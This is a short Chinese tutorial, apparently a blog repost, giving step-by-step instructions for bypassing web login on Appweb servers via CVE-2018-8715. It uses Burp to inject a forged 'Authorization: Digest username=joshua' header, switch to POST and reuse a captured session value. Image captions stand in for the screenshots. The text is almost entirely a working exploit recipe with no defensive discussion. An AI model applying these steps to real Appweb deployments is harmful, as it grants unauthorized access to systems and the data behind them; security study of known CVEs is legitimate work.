Appweb(CVE-2018-8715)绕过web登录

1.burp抓包,添加一条伪造的认证:Authorization: Digest username=joshua
Appweb(CVE-2018-8715)绕过web登录_第1张图片
2.更改请求为POST,并将http-session拷贝放在Authorization上
-http-session-=8::http.session::892900dd6ceba83363f31b377e6f9d39
Appweb(CVE-2018-8715)绕过web登录_第2张图片
3.放包即可
Appweb(CVE-2018-8715)绕过web登录_第3张图片
参考:https://blog.csdn.net/weixin_42936566/article/details/87120710

你可能感兴趣的:(学习)